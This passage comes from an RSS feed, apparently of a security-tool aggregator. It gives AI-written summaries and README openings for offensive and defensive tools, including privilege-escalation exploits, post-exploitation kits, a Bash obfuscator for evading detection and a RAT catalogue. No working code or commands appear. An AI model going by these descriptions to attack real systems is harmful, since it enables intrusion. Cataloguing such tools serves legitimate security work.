&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome OSINT For Everything is a comprehensive repository of OSINT tools and websites aimed at penetration testing, red teaming, information gathering, and bug bounty initiatives. It organizes a wide array of resources categorized by specific use cases such as recon, threat intelligence, social media analysis, and more, making it a valuable tool for cybersecurity professionals seeking to enhance their investigative capabilities. Notable features include a detailed index of tools across various domains, including geo-location, cryptocurrency, and privacy/security resources, providing users with extensive options for OSINT-related tasks.&lt;/p&gt;</description></item><item><title>awesome-php-security</title><link>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-php-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-php-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-php-security&amp;rdquo; repository is a curated collection of resources focused on enhancing security in PHP applications. Its primary use case is to provide developers with tools, educational materials, and best practices to mitigate security vulnerabilities. Notable features include sections on web framework hardening, static code analysis tools, and a comprehensive list of vulnerabilities and security advisories.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;br/&gt;
&lt;div align="center"&gt;
&lt;p&gt;A curated list of awesome PHP Security related resources.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://awesome.re"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>awesome-privilege-escalation</title><link>https://rainmana.github.io/hackyfeed/tools/m0nad-awesome-privilege-escalation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m0nad-awesome-privilege-escalation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Privilege Escalation is a comprehensive resource that curates techniques, tools, and methodologies for privilege escalation across multiple platforms, including Linux, Windows, Docker, and cloud environments. It features a structured table of contents with links to guides, techniques, and relevant presentations, allowing security professionals to efficiently explore various escalation vectors and strategies. Notable sections include targeted discussions on specific operating system techniques and curated tools for CVE identification and exploitation.&lt;/p&gt;</description></item><item><title>awesome-python-security</title><link>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-python-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guardrailsio-awesome-python-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-python-security&amp;rdquo; repository is a curated collection of resources focused on security related to Python programming. Its primary use case is to serve developers and security professionals by aggregating tools, educational materials, and references for secure coding practices, vulnerability detection, and compliance. Notable features include a categorized list of security tools like static code analysis, frameworks for web application security, and links to vulnerability databases and educational resources.&lt;/p&gt;</description></item><item><title>awesome-rat</title><link>https://rainmana.github.io/hackyfeed/tools/alphaseclab-awesome-rat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alphaseclab-awesome-rat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;lsquo;awesome-rat&amp;rsquo; repository serves as a comprehensive catalog of over 250 open-source Remote Access Tools (RATs) and associate Command &amp;amp; Control (C&amp;amp;C) frameworks, along with 1200+ analytical reports and articles related to RATs. It provides a structured directory that categorizes both open-source and commercial tools, as well as notable examples of malicious software, making it a valuable resource for cybersecurity professionals seeking to understand and analyze RATs and their implications. Key features include a detailed listing of tools, extensive documentation, and links to related research articles.&lt;/p&gt;</description></item><item><title>Awesome-RCE-techniques</title><link>https://rainmana.github.io/hackyfeed/tools/p0dalirius-awesome-rce-techniques/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p0dalirius-awesome-rce-techniques/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome RCE Techniques&amp;rdquo; repository is an open-source knowledge database that compiles various methods for achieving Remote Code Execution (RCE) across different applications. It features a collection of 24 RCE techniques categorized by platform type, including Content Management Systems and frameworks, each accompanied by Docker images for practical training and testing. This resource facilitates learning and experimentation for security professionals and developers interested in RCE dynamics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="awesome-rce-techniques"&gt;Awesome RCE techniques&lt;/h1&gt;
&lt;p align="center"&gt;
 Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps!
 &lt;br&gt;
 &lt;img alt="Number of RCE techniques" src="https://img.shields.io/badge/techniques-24-brightgreen"&gt;
 &lt;a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"&gt;&lt;img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&amp;style=social"&gt;&lt;/a&gt;
 &lt;a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"&gt;&lt;img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"&gt;&lt;/a&gt;
 &lt;br&gt;
&lt;/p&gt;</description></item><item><title>Awesome-Redteam</title><link>https://rainmana.github.io/hackyfeed/tools/threekiii-awesome-redteam/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/threekiii-awesome-redteam/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome-Redteam is a comprehensive knowledge base designed for red teaming and offensive security research, providing users with a curated collection of tools, scripts, and tips. It features organized sections covering various aspects such as cybersecurity cheat sheets, cryptographic methods, cyberspace search tools, and open-source intelligence resources, all intended for educational purposes. The repository emphasizes legal usage and warns against employing its content for unauthorized activities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="awesome-redteam"&gt;Awesome-Redteam&lt;/h1&gt;
&lt;p align="left"&gt;
 &lt;a href="https://github.com/Threekiii/Awesome-Redteam"&gt;
 &lt;img src="https://badgen.net/github/stars/Threekiii/Awesome-Redteam?color=yellow&amp;icon=github" alt="stars"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/Threekiii/Awesome-POC"&gt;
 &lt;img src="https://badgen.net/github/forks/Threekiii/Awesome-Redteam?color=blue&amp;icon=github" alt="forks"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/Threekiii/Awesome-POC"&gt;
 &lt;img src="https://badgen.net/github/last-commit/Threekiii/Awesome-Redteam?color=green" alt="last-commit"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;❗【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。 使用本项目前请先阅读 &lt;a href="https://github.com/Threekiii/Awesome-Laws"&gt;法律法规&lt;/a&gt;。&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Awesome-RedTeam-Cheatsheet</title><link>https://rainmana.github.io/hackyfeed/tools/ristbs-awesome-redteam-cheatsheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ristbs-awesome-redteam-cheatsheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Red Team Cheatsheet is a comprehensive reference tool designed for red team practitioners, providing techniques and methodologies for various stages of the attack lifecycle, including initial access, privilege escalation, lateral movement, and evasion strategies. It offers detailed sections on specific tactics like credential dumping, active directory exploitation, and OSINT, along with supporting guides on Windows protocols and operational security (OPSEC). Notable features include links to targeted exploitation techniques and enumeration strategies, aiding cybersecurity professionals in simulating attacks and improving defensive measures.&lt;/p&gt;</description></item><item><title>awesome-security-hardening</title><link>https://rainmana.github.io/hackyfeed/tools/decalage2-awesome-security-hardening/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/decalage2-awesome-security-hardening/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Security Hardening is a comprehensive repository that compiles best practices, guides, and resources for security hardening across various platforms including operating systems, network devices, and cloud services. Its notable features include detailed checklists, benchmarks (like CIS and ANSSI), and a curated list of tools for assessing and implementing security measures, catering to both general users and cybersecurity professionals. The project encourages community contributions to continually enhance its breadth and usability.&lt;/p&gt;</description></item><item><title>awesome-social-engineering</title><link>https://rainmana.github.io/hackyfeed/tools/giuliacassara-awesome-social-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/giuliacassara-awesome-social-engineering/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Social Engineering repository offers a curated collection of resources and tools specifically designed for cybersecurity professionals, penetration testers, and educational purposes within controlled environments. It features a diverse range of materials, including online courses, literature on psychology relevant to social engineering, and tools for practical application, making it a comprehensive guide for those interested in the field. Notably, it emphasizes ethical use and provides an engaging platform for learning and skill enhancement in social engineering techniques.&lt;/p&gt;</description></item><item><title>Awesome-Telegram-OSINT</title><link>https://rainmana.github.io/hackyfeed/tools/itismecall911-awesome-telegram-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/itismecall911-awesome-telegram-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome-Telegram-OSINT is a comprehensive repository designed for Open Source Intelligence (OSINT) related to Telegram. Its primary use case is to facilitate the search and discovery of Telegram channels, groups, and tools through a curated list of search engines and directories. Notable features include a wide array of resources for searching Telegram content, including specialized databases, search engines, and community-driven catalogs, making it a valuable tool for researchers and analysts in the OSINT community.&lt;/p&gt;</description></item><item><title>awesome-termux-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/may215-awesome-termux-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/may215-awesome-termux-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-termux-hacking&amp;rdquo; repository aggregates a collection of tools designed for penetration testing and security assessments on Android devices using the Termux environment. Key tools include ANDRAX, a robust penetration testing platform that functions natively on Android, and ReconCobra, an automated pentest framework for information gathering. This repository enhances the capabilities of ethical hacking on mobile platforms by offering various utilities for tasks such as subdomain enumeration, exploit searching, and proxy management.&lt;/p&gt;</description></item><item><title>awesome-web-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/infoslack-awesome-web-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infoslack-awesome-web-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-web-hacking&amp;rdquo; repository serves as a comprehensive resource for individuals seeking to enhance their knowledge of web application security. It includes categorized lists of books, documentation, tools, cheat sheets, and educational courses, making it a valuable starting point for learning about penetration testing and various security vulnerabilities. Notable features include contributions from the community through pull requests and a diverse array of resources for both beginners and experienced security professionals.&lt;/p&gt;</description></item><item><title>awesome-yara</title><link>https://rainmana.github.io/hackyfeed/tools/inquest-awesome-yara/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/inquest-awesome-yara/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome YARA is a curated repository that aggregates a comprehensive collection of YARA rules, tools, and resources aimed at enhancing malware detection and analysis. It serves as a valuable resource for cybersecurity professionals and researchers, featuring contributions from various practitioners, performance guidelines, and annual challenges to foster community engagement in YARA rule creation. Notable features include a wide array of rule collections from established cybersecurity entities and active maintenance status indicators for repositories of interest.&lt;/p&gt;</description></item><item><title>BabySploit</title><link>https://rainmana.github.io/hackyfeed/tools/m4cs-babysploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4cs-babysploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BabySploit is a user-friendly penetration testing toolkit designed to assist users in learning more complex frameworks like Metasploit. It features an intuitive interface and a suite of tools for exploiting vulnerabilities, making it accessible for users of all experience levels, while being optimized for Kali Linux and also tested for macOS compatibility. Notable functionality includes an integrated configuration management system and support for various essential exploitation tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit/week"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit/month"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit"&gt;&lt;/a&gt;&lt;/br&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/network"&gt;&lt;img src="https://img.shields.io/github/forks/M4cs/BabySploit.svg" alt="Forks"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/M4cs/BabySploit.svg" atl="Stars"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/issues"&gt;&lt;img src="https://img.shields.io/github/issues/M4cs/BabySploit.svg" alt="Issues"&gt;&lt;/a&gt;
 &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/version-1.5-green.svg?syle=popout"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/github/license/M4cs/BabySploit.svg" alt="License"&gt;&lt;/a&gt;
 &lt;a href="http://www.python.org/download/"&gt;&lt;img alt="Python 3.6+" src="https://img.shields.io/badge/Python-3.6+-yellow.svg"&gt;&lt;/a&gt;
 &lt;a href="https://twitter.com/intent/tweet?text=Wow:&amp;url=https%3A%2F%2Fgithub.com%2FM4cs%2FBabySploit"&gt;&lt;img src="https://img.shields.io/twitter/url/https/github.com/M4cs/BabySploit.svg?style=popout" alt="Twitter"&gt;&lt;/a&gt;
 &lt;a href="https://discord.gg/C7jgQeN"&gt;&lt;img src="https://img.shields.io/badge/discord-join-blue.svg?syle=popout"&gt;&lt;/a&gt;
&lt;p align="center"&gt;
 &lt;b&gt;Made For Kali Linux. No Support For Other Distros If There Are Problems. Tested and Working on MacOS for most Tools.&lt;/b&gt;
 &lt;/br&gt;&lt;a href="https://twitter.com/maxbridgland" alt="Twitter Link"&gt;&lt;b&gt;Developed by @maxbridgland&lt;/b&gt;&lt;/a&gt;&lt;/br&gt;
 &lt;a href="https://bit.ly/2Ke9uVi"&gt;Donate&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>BadPotato</title><link>https://rainmana.github.io/hackyfeed/tools/beichendream-badpotato/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/beichendream-badpotato/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BadPotato is a penetration testing tool designed for exploiting a vulnerability within Windows operating systems, specifically targeting Windows Server 2012-2019 and Windows 8-10. Its primary use case is to escalate privileges by abusing the Print Spooler service, enabling attackers to execute arbitrary code with elevated permissions. Notable features include efficient integration with existing exploits and a straightforward execution process for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="badpotato"&gt;BadPotato&lt;/h1&gt;
&lt;p&gt;Windows 2012-2019&lt;/p&gt;
&lt;p&gt;Windows 8-10&lt;/p&gt;</description></item><item><title>Baileys</title><link>https://rainmana.github.io/hackyfeed/tools/whiskeysockets-baileys/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/whiskeysockets-baileys/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Baileys is a WebSockets-based TypeScript library designed for direct interaction with the WhatsApp Web API, eliminating the need for Selenium or any browser, thus optimizing memory usage. It supports both the multi-device and web versions of WhatsApp, allowing developers to efficiently implement messaging functionalities. Notable features include a simplified interface for interaction and removal of browser dependencies, reducing resource overhead.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align='center'&gt;&lt;img alt="Baileys logo" src="https://raw.githubusercontent.com/WhiskeySockets/Baileys/refs/heads/master/Media/logo.png" height="75"/&gt;&lt;/h1&gt;
&lt;div align='center'&gt;Baileys is a WebSockets-based TypeScript library for interacting with the WhatsApp Web API.&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;[!CAUTION]
NOTICE OF BREAKING CHANGE.&lt;/p&gt;</description></item><item><title>bandit</title><link>https://rainmana.github.io/hackyfeed/tools/pycqa-bandit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pycqa-bandit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bandit is a security linter specifically designed to identify common security vulnerabilities in Python code by analyzing the Abstract Syntax Tree (AST) of the source files. Its primary use case is to enhance code security through comprehensive scanning and reporting, and it features the ability to run various plugins to detect different types of security issues. Bandit also supports containerization, allowing it to be easily deployed as a Docker image for versatile integration into development workflows.&lt;/p&gt;</description></item><item><title>Bashark</title><link>https://rainmana.github.io/hackyfeed/tools/redcode-labs-bashark/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/redcode-labs-bashark/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bashark 2.0 is a post-exploitation toolkit designed for penetration testers and security researchers to facilitate operations during the post-exploitation phase of security audits. It offers a simple command-line interface, where users can source the &lt;code&gt;bashark.sh&lt;/code&gt; script to access various functions and commands, streamlining the process of managing compromised hosts. Key features include ease of use through a help menu and support for Bash scripting, making it a practical tool for enhancing post-exploitation activities.&lt;/p&gt;</description></item><item><title>bashbunny-payloads</title><link>https://rainmana.github.io/hackyfeed/tools/hak5-bashbunny-payloads/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hak5-bashbunny-payloads/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Bash Bunny Payload Library provides a collection of community-developed payloads and extensions specifically designed for the Hak5 Bash Bunny, utilizing DuckyScript™ and Bash scripting languages. Its primary use case is to enable users to automate various tasks through the intuitive deployment of scripts, with notable features including community contributions and the ability to submit new payloads via pull requests. Additionally, the repository encourages collaboration and offers resources for building payloads through its associated PayloadStudio.&lt;/p&gt;</description></item><item><title>Bashfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/bashfuscator-bashfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bashfuscator-bashfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bashfuscator is a modular Bash obfuscation framework implemented in Python 3 that specializes in generating highly obfuscated Bash commands and scripts to evade detection on Linux systems. Designed for both Red Team and Blue Team operations, it allows users to produce randomized, convoluted Bash code that still executes the intended commands, effectively aiding in the development of obfuscation techniques and detection testing. Key features include command line and library usage, a variety of obfuscation mutators, and compatibility with GNU Linux systems running Bash 4.0 or newer.&lt;/p&gt;</description></item><item><title>bbot</title><link>https://rainmana.github.io/hackyfeed/tools/blacklanternsecurity-bbot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blacklanternsecurity-bbot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BBOT is a versatile reconnaissance tool designed primarily for automating tasks related to bug bounties and attack surface management (ASM). Notable features include comprehensive subdomain enumeration, web crawling to extract sensitive information, and an efficient integration of multiple APIs to enhance data gathering effectiveness. The tool also boasts a real-time visualization capability, allowing users to intuitively analyze results.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/blacklanternsecurity/bbot"&gt;&lt;img src="https://github.com/user-attachments/assets/f02804ce-9478-4f1e-ac4d-9cf5620a3214" alt="bbot_banner"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.python.org"&gt;&lt;img src="https://img.shields.io/badge/python-3.9+-FF8400" alt="Python Version"&gt;&lt;/a&gt; &lt;a href="https://github.com/blacklanternsecurity/bbot/blob/dev/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-AGPLv3-FF8400.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://www.reconvillage.org/talks"&gt;&lt;img src="https://img.shields.io/badge/DEF%20CON%20Demo%20Labs-2023-FF8400.svg" alt="DEF CON Recon Village 2024"&gt;&lt;/a&gt; &lt;a href="https://pepy.tech/project/bbot"&gt;&lt;img src="https://static.pepy.tech/personalized-badge/bbot?right_color=orange&amp;amp;left_color=grey" alt="PyPi Downloads"&gt;&lt;/a&gt; &lt;a href="https://github.com/astral-sh/ruff"&gt;&lt;img src="https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json" alt="Ruff"&gt;&lt;/a&gt; &lt;a href="https://github.com/blacklanternsecurity/bbot/actions?query=workflow%3A%22tests%22"&gt;&lt;img src="https://github.com/blacklanternsecurity/bbot/actions/workflows/tests.yml/badge.svg?branch=stable" alt="Tests"&gt;&lt;/a&gt; &lt;a href="https://codecov.io/gh/blacklanternsecurity/bbot"&gt;&lt;img src="https://codecov.io/gh/blacklanternsecurity/bbot/branch/dev/graph/badge.svg?token=IR5AZBDM5K" alt="Codecov"&gt;&lt;/a&gt; &lt;a href="https://discord.com/invite/PZqkgxu5SA"&gt;&lt;img src="https://img.shields.io/discord/859164869970362439" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="beebot-is-a-multipurpose-scanner-inspired-by-spiderfoot-built-to-automate-your-recon-bug-bounties-and-asm"&gt;&lt;strong&gt;BEE·bot&lt;/strong&gt; is a multipurpose scanner inspired by &lt;a href="https://github.com/smicallef/spiderfoot"&gt;Spiderfoot&lt;/a&gt;, built to automate your &lt;strong&gt;Recon&lt;/strong&gt;, &lt;strong&gt;Bug Bounties&lt;/strong&gt;, and &lt;strong&gt;ASM&lt;/strong&gt;!&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://github.com/blacklanternsecurity/bbot/assets/20261699/e539e89b-92ea-46fa-b893-9cde94eebf81"&gt;https://github.com/blacklanternsecurity/bbot/assets/20261699/e539e89b-92ea-46fa-b893-9cde94eebf81&lt;/a&gt;&lt;/p&gt;</description></item><item><title>BinAbsInspector</title><link>https://rainmana.github.io/hackyfeed/tools/keensecuritylab-binabsinspector/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/keensecuritylab-binabsinspector/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BinAbsInspector is a static analysis tool designed for automated reverse engineering and vulnerability scanning of binary files, utilizing abstract interpretation and integrating with Ghidra. It supports multiple architectures including x86, x64, armv7, and aarch64, and can operate in headless mode, GUI mode, or within a Docker environment. Notable features include customizable analysis parameters, Z3 integration for constraint solving, and the ability to output results in JSON format.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="what-is--binabsinspector"&gt;What is BinAbsInspector?&lt;/h1&gt;
&lt;p&gt;BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at &lt;a href="https://keenlab.tencent.com/"&gt;Keenlab&lt;/a&gt;. It is based on abstract interpretation with the support from Ghidra. It works on Ghidra&amp;rsquo;s Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.&lt;/p&gt;</description></item><item><title>binaryninja-api</title><link>https://rainmana.github.io/hackyfeed/tools/vector35-binaryninja-api/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vector35-binaryninja-api/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Binary Ninja API repository provides comprehensive C++, Python, and Rust APIs for the Binary Ninja reverse engineering platform, enabling developers to create plugins and enhance functionality. Notable features include extensive online documentation, examples for various applications, and support for building UI and headless plugins. The setup process includes CMake-based build instructions, ensuring compatibility with specific Binary Ninja versions through a revision hash.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://slack.binary.ninja/"&gt;&lt;img src="https://img.shields.io/badge/slack-binaryninja-red.svg?logo=slack" alt="slack"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="binary-ninja-api"&gt;Binary Ninja API&lt;/h1&gt;
&lt;p&gt;This repository contains documentation and source code of the C++, Python, and Rust APIs for the &lt;a href="https://binary.ninja/"&gt;Binary Ninja&lt;/a&gt; reverse engineering platform.&lt;/p&gt;</description></item><item><title>bincat</title><link>https://rainmana.github.io/hackyfeed/tools/airbus-seclab-bincat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/airbus-seclab-bincat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BinCAT is a static binary code analysis toolkit designed to assist reverse engineers using IDA and Python automation. Its primary use cases include value and taint analysis, type reconstruction, and detection of memory management issues like use-after-free and double-free errors. Notable features include support for multiple CPU architectures, integration with IDA version 7.4 or later, and the ability to operate both locally and remotely via a web service.&lt;/p&gt;</description></item><item><title>binder-trace</title><link>https://rainmana.github.io/hackyfeed/tools/foundryzero-binder-trace/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/foundryzero-binder-trace/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Binder Trace is a Python-based tool designed for intercepting and parsing Android Binder messages, functioning similarly to Wireshark for Binder communication. It requires a rooted Android device or emulator and leverages Frida for live analysis, allowing users to attach to specific processes and capture Binder transactions. Notable features include support for various Android versions, customizable structure files, and interactive controls for navigating captured data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://github.com/foundryzero/binder-trace/raw/main/binder-trace.png" alt="binder-trace logo"/&gt;
&lt;/p&gt;
&lt;h1 id="binder-trace"&gt;Binder Trace&lt;/h1&gt;
&lt;p&gt;Binder Trace is a tool for intercepting and parsing Android Binder messages. Think of it as &amp;ldquo;Wireshark for Binder&amp;rdquo;.&lt;/p&gt;</description></item><item><title>binexport</title><link>https://rainmana.github.io/hackyfeed/tools/google-binexport/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/google-binexport/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BinExport is a plugin for disassemblers such as IDA Pro, Binary Ninja, and Ghidra that facilitates the export of disassembly data into Protocol Buffer format, which is essential for use with the BinDiff tool. Its primary use case is in binary analysis and reverse engineering, enabling users to perform efficient comparison and analysis of executable files. Notable features include support for multiple platforms (Linux, macOS, Windows) and seamless integration with popular static analysis tools.&lt;/p&gt;</description></item><item><title>binsider</title><link>https://rainmana.github.io/hackyfeed/tools/orhun-binsider/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/orhun-binsider/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Binsider is a versatile tool designed for reverse engineers, enabling both static and dynamic analysis of binary files through an intuitive terminal interface. Key functionalities include inspection of binary metadata, string analysis, examination of linked libraries, and detailed ELF layout analysis, all aimed at enhancing understanding of executable files.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
